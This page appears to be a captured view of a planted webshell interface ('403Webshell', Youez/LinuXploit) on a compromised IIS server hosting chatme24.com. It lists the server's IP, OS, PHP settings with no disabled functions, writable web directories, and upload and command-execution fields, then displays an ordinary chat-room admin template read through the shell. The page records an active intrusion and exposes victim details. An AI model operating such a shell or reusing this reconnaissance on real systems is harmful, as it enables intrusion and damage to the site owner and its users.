403Webshell
Server IP : 209.209.40.120  /  Your IP : 216.73.217.112
Web Server : Microsoft-IIS/10.0
System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586
User : NEWWWW$ ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/HostingSpaces/admin/chatme24.com/wwwroot/administration/default/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/HostingSpaces/admin/chatme24.com/wwwroot/administration/default//3dchat_edit.html
{header}
<div class="block_narrow">
    <ul class="lmenu_lgreen">
        <li <!-- begin_edit_rooms --> class="active" <!-- end_edit_rooms -->><a href="{url_main}administration/3dchat_rooms.php">{l_menu_flashchat_rooms}</a></li>
        <li <!-- begin_add_rooms --> class="active" <!-- end_add_rooms -->><a href="{url_main}administration/3dchat_edit.php">{l_menu_flashchat_rooms_edit}</a></li>
    </ul>
</div>
<div class="block_main">
    <h2><!-- begin_add_rooms_title -->{l_title_current}<!-- end_add_rooms_title --><!-- begin_edit_rooms_title -->{l_editing_room} - {name}<!-- end_edit_rooms_title --></h2>
    <!-- begin_upload_rooms_bg_js -->
    <script>
    $(function() {
        $('#bg_form').ajaxForm({
            beforeSubmit: function(a,f,o) {
                $('#bg_output').html('{l_submitting}');
            },
            success: function(data) {
                var obj = jQuery.parseJSON(data),
                    url = '{url_files}3dchat/{id}.jpg';
                if (typeof obj.url != 'undefined') {
                    url = obj.url;
                }
                $('#bg_output').html('<img src="'+url+'?' + Math.random() + '" alt=""/>');
                if (obj.status == 0) {
                    alert(obj.msg);
                }
            }
        });
    });
    </script>
    <!-- end_upload_rooms_bg_js -->
    <div class="bl_form">
        <form id="form" action="{url_page}" enctype="multipart/form-data" method="POST">
        <!-- begin_edit_form -->
        <input type="hidden" name="cmd" value="edit">
        <input type="hidden" name="id" value="{id}">
        <!-- end_edit_form -->
        <label>{l_name}:</label>
        <input type="text" name="name" value="{name}" maxlength="18">

        <!-- begin_add_form -->
        <input type="hidden" name="cmd" value="add">
        <label>{l_background_room}:</label>
        <input class="" type="file" name='bg'/>
        <!-- end_add_form -->

        <div class="wrap_button fl_right">
            <button class="button submit" type="submit">{l_save}</button>
            <div class="button_submit_instruction">{l_or_use_ctrl_s}</div>
        </div>
        </form>
        <!-- begin_upload_rooms_bg -->
        <div class="empty"></div>
        <form id="bg_form" action="{url_page}" method="POST" enctype="multipart/form-data">
        <input type="hidden" name="cmd" value="update_bg">
        <input type="hidden" name="id" value="{id}">

        <div id="bg_output" class="block_logo room_logo">
            <img id="bg_output_img" src="{url_files}3dchat/{id}.jpg?rand={rand}" alt=""/>
        </div>

        <div class="fl_left">
            <input class="upload" type="file" name='bg'/>
        </div>
        <div class="wrap_button fl_right">
            <button class="button submit" type="submit">{l_save}</button>
            <div class="button_submit_instruction">{l_or_use_ctrl_s}</div>
        </div>
        </form>
        <!-- end_upload_rooms_bg -->
    </div>
    <div class="empty"></div>
</div>
{footer}
<!-- begin_error -->
<script>
    alert('{error}');
</script>
<!-- end_error -->

Youez - 2016 - github.com/yon3zu
LinuXploit